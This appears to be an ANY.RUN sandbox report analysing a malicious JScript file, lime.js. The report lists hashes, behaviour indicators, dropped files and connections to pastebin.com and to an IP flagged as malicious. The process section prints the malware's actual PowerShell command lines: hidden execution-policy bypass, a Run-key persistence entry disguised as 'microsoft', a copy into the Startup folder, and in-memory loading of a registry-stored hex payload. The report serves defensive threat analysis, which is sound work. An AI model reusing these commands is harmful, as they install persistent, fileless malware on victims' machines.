analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

lime.js

Full analysis: https://app.any.run/tasks/0a4f05ee-7534-4d4c-b97b-9bd4923c6d1e
Verdict: Malicious activity
Analysis date: August 13, 2019, 16:30:08
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines, with CRLF line terminators
MD5:

1E89379F34AAFD46CE829499E73042AF

SHA1:

48316579C2E8902411B45C1A9545F4FAB8E87F0F

SHA256:

9674359F0C4DB134EE806D70C2E7E869A3FBA74389D3A1C3E85C61BFD719C54A

SSDEEP:

768:TlbXyDfW7QxO0cKtmUpwbT0pEqapHCE0nY:TlbXyDfW7QxOnKEUpwbOQr

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Changes the autorun value in the registry

      • powershell.exe (PID: 4044)
    • Writes to a start menu file

      • powershell.exe (PID: 2160)
  • SUSPICIOUS

    • Executes PowerShell scripts

      • WScript.exe (PID: 2396)
      • wscript.exe (PID: 3044)
    • Executes scripts

      • powershell.exe (PID: 2388)
    • Creates files in the user directory

      • powershell.exe (PID: 2388)
      • powershell.exe (PID: 2160)
      • powershell.exe (PID: 4044)
      • powershell.exe (PID: 2804)
    • Connects to unusual port

      • powershell.exe (PID: 2804)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
43
Monitored processes
6
Malicious processes
3
Suspicious processes
2

Behavior graph

Click at the process to see the details
start wscript.exe no specs powershell.exe no specs wscript.exe no specs powershell.exe powershell.exe powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2396"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\lime.js"C:\Windows\System32\WScript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
2388"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\lime.js',[System.IO.File]::ReadAllText('C:\Users\admin\AppData\Local\Temp\lime.js'));wscript 'C:\Users\admin\AppData\Roaming\lime.js'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3044"C:\Windows\system32\wscript.exe" C:\Users\admin\AppData\Roaming\lime.jsC:\Windows\system32\wscript.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
4044"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\admin\AppData\Roaming\lime.js' -PropertyType String -Force;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2160"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\lime.js',[System.IO.File]::ReadAllText('C:\Users\admin\AppData\Roaming\lime.js'))"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2804"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "function H2B([string]$s){$H=@();for ($i=0;$i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);};return $H;};$_b=(get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'microsoft').microsoft;$_b=$_b.replace('@','0');[byte[]]$_0 = H2B($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 011
Read events
757
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
8
Text files
2
Unknown types
0

Dropped files

PID
Process
Filename
Type
2388powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QB9PK0GYGCE7HL20JL22.temp
MD5:
SHA256:
4044powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RQA81CUN506TIXW0ZT8A.temp
MD5:
SHA256:
2160powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZQCSOVQJ1PACDJLE5D3U.temp
MD5:
SHA256:
2804powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GQRU1ZDFKUHPRN409YIQ.temp
MD5:
SHA256:
4044powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:A25A3218432767D044A42DFB20430D13
SHA256:89B8F26BBB4687757C87D5EF3D77646AF493AFFCF68B572BD2D4D5CE07C97BE7
2388powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF379e57.TMPbinary
MD5:A25A3218432767D044A42DFB20430D13
SHA256:89B8F26BBB4687757C87D5EF3D77646AF493AFFCF68B572BD2D4D5CE07C97BE7
2804powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:A25A3218432767D044A42DFB20430D13
SHA256:89B8F26BBB4687757C87D5EF3D77646AF493AFFCF68B572BD2D4D5CE07C97BE7
2804powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF37a349.TMPbinary
MD5:A25A3218432767D044A42DFB20430D13
SHA256:89B8F26BBB4687757C87D5EF3D77646AF493AFFCF68B572BD2D4D5CE07C97BE7
2388powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:A25A3218432767D044A42DFB20430D13
SHA256:89B8F26BBB4687757C87D5EF3D77646AF493AFFCF68B572BD2D4D5CE07C97BE7
2160powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:A25A3218432767D044A42DFB20430D13
SHA256:89B8F26BBB4687757C87D5EF3D77646AF493AFFCF68B572BD2D4D5CE07C97BE7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
2
DNS requests
3
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2804
powershell.exe
104.20.209.21:443
pastebin.com
Cloudflare Inc
US
shared
2804
powershell.exe
193.56.28.134:9505
malicious

DNS requests

Domain
IP
Reputation
pastebin.com
  • 104.20.209.21
  • 104.20.208.21
shared
dns.msftncsi.com
  • 131.107.255.255
shared

Threats

No threats detected
No debug info